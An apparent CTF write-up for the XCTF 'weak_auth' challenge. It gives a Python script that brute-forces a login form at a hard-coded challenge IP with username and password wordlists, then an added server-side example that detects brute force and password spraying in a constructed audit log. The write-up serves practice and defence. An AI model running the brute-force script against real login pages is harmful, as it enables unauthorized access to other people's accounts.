XCTF-weak_auth

Beginner practice area - 8/12

🐍🐍🐍Code🐍🐍🐍

  1. User dictionary + password dictionary: nested `for` loops walk both lists and send one request per username/password pair.
  2. Save the `.text` of each response.
     1. Check whether the body contains a string that signals "no flag here"; in this challenge those strings are "password error" and "please login as admin".
     2. Compare each body with the ones seen before and print it if it is new.

```python
import requests


def ReadDictionary(txtUser, txtPassword):
    # Read both wordlists, one entry per line
    with open(txtUser, encoding='utf-8') as f:
        listUser = f.read().splitlines()
    # print(listUser)
    with open(txtPassword, encoding='utf-8') as f:
        listPassword = f.read().splitlines()
    # print(listPassword)
    return listUser, listPassword


def BruteForce_UserAndPassword(inputUser, inputPassword):
    bGet = 0            # set to 1 once a response without the error strings is seen
    listResponse = []   # distinct response bodies seen so far
    for iUser in inputUser:
        for iPassword in inputPassword:
            dic2Post = {
                'username': iUser,
                'password': iPassword
            }
            # print(dic2Post)
            response = requests.post(url, data=dic2Post, timeout=33)
            if response.status_code == 200:
                textResponse = response.text
                # Decide based on the hint strings that appear in failed responses
                if ((strErr1 not in textResponse) and (strErr2 not in textResponse)):
                    print("密码为:", dic2Post)
                    bGet = 1
                elif textResponse not in listResponse:
                    listResponse.append(textResponse)
    if bGet == 0:
        # Nothing matched: dump every distinct body so the filter strings can be adjusted
        print("所有返回包:")
        print(set(listResponse))


url = r"http://111.200.241.244:63653/check.php"
txtUser = r"User.txt"
txtPassword = r"Password.txt"
strErr1 = "password error"
strErr2 = "please login as admin"

if __name__ == '__main__':
    listUser, listPassword = ReadDictionary(txtUser, txtPassword)
    BruteForce_UserAndPassword(listUser, listPassword)
```
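The script above works because every failed login returns the same body and the server never slows the client down. Below is an added example, written from the server's side and not part of the original writeup, showing how a login audit log would expose this pattern: it counts failures per source IP inside a sliding window, distinguishes a single-account brute force from password spraying across many usernames, and notes when a success follows such a burst. The log format and all entries are constructed for the example, and the `threshold` and `window` values are assumptions a site would tune to its own traffic.

```python
"""Flag dictionary-style login attacks from a login audit log (added example).

Each record is: ISO timestamp, client IP, username, outcome ("failure"/"success").
This format is constructed for the example, not the challenge's real logging.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample audit lines (hypothetical data).
SAMPLE_AUDIT = """\
2024-01-01T10:00:00 10.0.0.5 admin failure
2024-01-01T10:00:01 10.0.0.5 admin failure
2024-01-01T10:00:01 10.0.0.5 admin failure
2024-01-01T10:00:02 10.0.0.5 admin failure
2024-01-01T10:00:02 10.0.0.5 admin failure
2024-01-01T10:00:03 10.0.0.5 admin success
2024-01-01T10:00:00 192.0.2.10 alice failure
2024-01-01T10:05:00 192.0.2.10 alice success
2024-01-01T10:00:00 198.51.100.7 root failure
2024-01-01T10:00:00 198.51.100.7 guest failure
2024-01-01T10:00:01 198.51.100.7 test failure
2024-01-01T10:00:01 198.51.100.7 user failure
2024-01-01T10:00:02 198.51.100.7 admin failure
"""


def parse_audit(text):
    """Parse audit lines into (timestamp, ip, user, outcome) tuples, sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, ip, user, outcome = line.split()
        events.append((datetime.fromisoformat(ts), ip, user, outcome))
    events.sort(key=lambda e: e[0])  # stable sort keeps same-second order
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: alert} for sources with >= threshold failures inside any window.

    threshold and window are assumed tuning values, not figures from the page.
    """
    recent = defaultdict(deque)  # ip -> deque of (ts, user) failures still in window
    alerts = {}
    for ts, ip, user, outcome in events:
        if outcome == "success":
            # A success right after a flagged burst is the event worth paging on
            if ip in alerts:
                alerts[ip].setdefault("success_after_burst", []).append(user)
            continue
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            users = {u for _, u in q}
            alerts[ip] = {
                "failures": len(q),
                "distinct_users": len(users),
                # many usernames from one source = spraying; one username = brute force
                "pattern": "password spraying" if len(users) > 1
                           else "single-account brute force",
                "first_seen": q[0][0].isoformat(),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_audit(SAMPLE_AUDIT)).items():
        print(ip, info)
```

The same counter that raises the alert is the natural place to enforce a per-source or per-account lockout or delay, which is the control the writeup's script is counting on being absent; responding with identical bodies for "wrong user" and "wrong password" is already the right choice and should be kept, since the detection here does not depend on body differences at all.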